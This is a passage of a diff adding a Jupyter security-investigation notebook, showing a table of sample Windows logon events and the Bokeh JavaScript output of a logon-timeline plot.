+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4624</td>\n",
+       "      <td>2019-01-15 04:28:33.090</td>\n",
+       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAdmin</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
+       "      <td>0xfaac27</td>\n",
+       "      <td>Advapi</td>\n",
+       "      <td>4</td>\n",
+       "      <td>Negotiate</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>-</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>2319</td>\n",
+       "      <td>5</td>\n",
+       "      <td>True</td>\n",
+       "      <td>0</td>\n",
+       "      <td>2</td>\n",
+       "      <td>2019-01-15 04:28:33.090</td>\n",
+       "      <td>2019-01-15 05:15:02.980</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>1</td>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>4624</td>\n",
+       "      <td>2019-01-15 01:42:28.340</td>\n",
+       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>SYSTEM</td>\n",
+       "      <td>NT AUTHORITY</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>Advapi</td>\n",
+       "      <td>5</td>\n",
+       "      <td>Negotiate</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>-</td>\n",
+       "      <td>-</td>\n",
+       "      <td>1484</td>\n",
+       "      <td>5</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1</td>\n",
+       "      <td>11</td>\n",
+       "      <td>2019-01-15 01:42:28.340</td>\n",
+       "      <td>2019-01-15 05:15:14.453</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 10
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "source": [
+    "# Show timeline of events - all logons + clustered logons\n",
+    "# ref marker indicates\n",
+    "logon_data = {\"Clustered\": {\"data\": clus_logons},\n",
+    "              \"All Logons\": {\"data\": host_logons}}\n",
+    "nbdisplay.display_timeline(data=logon_data,\n",
+    "                           source_columns=['Account', 'LogonType'],\n",
+    "                           ref_event=clus_logons.iloc[0],\n",
+    "                           title='All Host Logons', legend=\"inline\")"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1279\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1279\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\": \"JayppSWSRBsibIZqI8S4vAb1oFgLL0uhNvSn8cmArlOvYOwfFjYeyY5UWwJ+K0SU\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\": \"G0/Tv/Yy/zEPNsnW0Qif/FOsGesd+KIrKg/QLmvQmReuUW9qmSP7mAmr0VpiUNr3\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\": \"VLYHEbLQDk5G1+/4ALU0myoJPMEUsngWry2fzYorFOUmarjGRPLLURaeK/on6JqX\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1279\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"71b41fee-d723-4d46-9032-8e76bb07a262\" data-root-id=\"1410\"></div>\n"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/vnd.bokehjs_exec.v0+json": "",
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"6b2bc0ee-4dbd-493b-be91-65ce3abb81f5\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1283\"},{\"id\":\"1315\"}]},\"id\":\"1410\",\"type\":\"Column\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1282\"},{\"id\":\"1302\"},{\"id\":\"1303\"},{\"id\":\"1304\"},{\"id\":\"1305\"},{\"id\":\"1306\"}]},\"id\":\"1308\",\"type\":\"Toolbar\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1316\",\"type\":\"Title\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1437\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1345\"},\"x_range\":{\"id\":\"1286\"},\"y_range\":null},\"id\":\"1344\",\"type\":\"RangeTool\"},{\"attributes\":{\"data_source\":{\"id\":\"1281\"},\"glyph\":{\"id\":\"1340\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1341\"},\"selection_glyph\":null,\"view\":{\"id\":\"1343\"}},\"id\":\"1342\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1336\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1332\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"1320\",\"type\":\"DataRange1d\"},{\"attributes\":{},\"id\":\"1322\",\"type\":\"LinearScale\"},{\"attributes\":{\"source\":{\"id\":\"1280\"}},\"id\":\"1355\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1359\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\MSTICAdmin\",\"NT AUTHORITY\\\\SYSTEM\",\"MSTICAlertsWin1\\\\adm1nistrator\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\"],\"LogonType\":[4,5,3,5,5,4,5,5,5,5,5,5,5,5],\"TimeGenerated\":{\"__ndarray__\":\"AEA88/6EdkIAcJvz/oR2QgCwD/T+hHZCANAl9f6EdkIAUAn2/oR2QgAgHEr8hHZCABCzePiEdkIAUEV5+IR2QgAQTWn2hHZCAPDeafaEdkIAQE/J8oR2QgCgGfTyhHZCAJDayPeEdkIAsG3J94R2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"1389\"},\"selection_policy\":{\"id\":\"1390\"}},\"id\":\"1281\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1379\",\"type\":\"Diamond\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1341\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1349\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"],[\"LogonType\",\"@LogonType\"],[\"Account\",\"@Account\"]]},\"id\":\"1282\",\"type\":\"HoverTool\"},{\"attributes\":{\"fill_color\":{\"value\":\"#440154\"},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1335\",\"type\":\"Circle\"},{\"attributes\":{\"data_source\":{\"id\":\"1280\"},\"glyph\":{\"id\":\"1352\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1353\"},\"selection_glyph\":null,\"view\":{\"id\":\"1355\"}},\"id\":\"1354\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"end\":1.5,\"start\":-0.5},\"id\":\"1288\",\"type\":\"Range1d\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1370\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1444\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1390\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1367\",\"type\":\"DaysTicker\"},{\"attributes\":{\"text\":\"Timeline: All Host Logons\"},\"id\":\"1284\",\"type\":\"Title\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1368\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1345\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1369\",\"type\":\"DaysTicker\"},{\"attributes\":{\"end\":1547530591064.3,\"start\":1547515271728.7},\"id\":\"1286\",\"type\":\"Range1d\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1446\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1365\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1445\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1326\"},{\"id\":\"1331\"}],\"center\":[{\"id\":\"1329\"}],\"plot_height\":120,\"plot_width\":900,\"renderers\":[{\"id\":\"1337\"},{\"id\":\"1342\"}],\"title\":{\"id\":\"1316\"},\"toolbar\":{\"id\":\"1330\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1318\"},\"x_scale\":{\"id\":\"1322\"},\"y_range\":{\"id\":\"1320\"},\"y_scale\":{\"id\":\"1324\"}},\"id\":\"1315\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1371\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1292\",\"type\":\"LinearScale\"},{\"attributes\":{\"data\":{\"x\":[1547529306363.0,1547529306363.0],\"y\":[0,2]},\"selected\":{\"id\":\"1422\"},\"selection_policy\":{\"id\":\"1423\"}},\"id\":\"1404\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"label\":{\"value\":\"All Logons\"},\"renderers\":[{\"id\":\"1380\"}]},\"id\":\"1403\",\"type\":\"LegendItem\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1353\",\"type\":\"Diamond\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1372\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1290\",\"type\":\"LinearScale\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\adm1nistrator\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"NT AUTHORITY\\\\SYSTEM\"],\"LogonType\":[3,4,5],\"TimeGenerated\":{\"__ndarray__\":\"ALAP9P6EdkIAIBxK/IR2QgBAT8nyhHZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[3]},\"index\":[2,0,1],\"y_index\":[0,0,0]},\"selected\":{\"id\":\"1361\"},\"selection_policy\":{\"id\":\"1362\"}},\"id\":\"1280\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#FDE724\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1378\",\"type\":\"Diamond\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1363\"},{\"id\":\"1364\"},{\"id\":\"1365\"},{\"id\":\"1366\"},{\"id\":\"1367\"},{\"id\":\"1368\"},{\"id\":\"1369\"},{\"id\":\"1370\"},{\"id\":\"1371\"},{\"id\":\"1372\"},{\"id\":\"1373\"},{\"id\":\"1374\"}]},\"id\":\"1295\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1373\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"1280\"}},\"id\":\"1338\",\"type\":\"CDSView\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1447\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1448\",\"type\":\"YearsTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"1349\"},\"ticker\":{\"id\":\"1295\"}},\"id\":\"1294\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#440154\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1352\",\"type\":\"Diamond\"},{\"attributes\":{\"click_policy\":\"hide\",\"items\":[{\"id\":\"1376\"},{\"id\":\"1403\"}],\"location\":\"center_left\"},\"id\":\"1375\",\"type\":\"Legend\"},{\"attributes\":{},\"id\":\"1299\",\"type\":\"BasicTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1294\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1297\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1374\",\"type\":\"YearsTicker\"},{\"attributes\":{\"source\":{\"id\":\"1281\"}},\"id\":\"1343\",\"type\":\"CDSView\"},{\"attributes\":{\"formatter\":{\"id\":\"1359\"},\"ticker\":{\"id\":\"1299\"},\"visible\":false},\"id\":\"1298\",\"type\":\"LinearAxis\"},{\"attributes\":{\"source\":{\"id\":\"1281\"}},\"id\":\"1381\",\"type\":\"CDSView\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1366\",\"type\":\"DaysTicker\"},{\"attributes\":{\"end\":1547531229369.95,\"start\":1547514633423.05},\"id\":\"1318\",\"type\":\"Range1d\"},{\"attributes\":{\"source\":{\"id\":\"1404\"}},\"id\":\"1408\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1361\",\"type\":\"Selection\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1363\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"label\":{\"value\":\"Clustered\"},\"renderers\":[{\"id\":\"1354\"}]},\"id\":\"1376\",\"type\":\"LegendItem\"},{\"attributes\":{\"data_source\":{\"id\":\"1404\"},\"glyph\":{\"id\":\"1405\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1406\"},\"selection_glyph\":null,\"view\":{\"id\":\"1408\"}},\"id\":\"1407\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1422\",\"type\":\"Selection\"},{\"attributes\":{\"axis\":{\"id\":\"1298\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1301\",\"type\":\"Grid\"},{\"attributes\":{\"fill_color\":{\"value\":\"#FDE724\"},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1340\",\"type\":\"Circle\"},{\"attributes\":{\"line_color\":\"red\",\"line_dash\":[6],\"line_width\":2,\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"1405\",\"type\":\"Line\"},{\"attributes\":{},\"id\":\"1362\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"data_source\":{\"id\":\"1281\"},\"glyph\":{\"id\":\"1378\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1379\"},\"selection_glyph\":null,\"view\":{\"id\":\"1381\"}},\"id\":\"1380\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1364\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"1280\"},\"glyph\":{\"id\":\"1335\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1336\"},\"selection_glyph\":null,\"view\":{\"id\":\"1338\"}},\"id\":\"1337\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1302\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"1305\",\"type\":\"SaveTool\"},{\"attributes\":{\"overlay\":{\"id\":\"1307\"}},\"id\":\"1303\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1439\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"1304\",\"type\":\"ResetTool\"},{\"attributes\":{\"background_fill_alpha\":0.5,\"background_fill_color\":\"white\",\"border_line_color\":\"red\",\"render_mode\":\"css\",\"text\":\"< Event time\",\"text_font_size\":\"8pt\",\"x\":1547529306363.0,\"y\":0,\"y_offset\":10},\"id\":\"1409\",\"type\":\"Label\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main 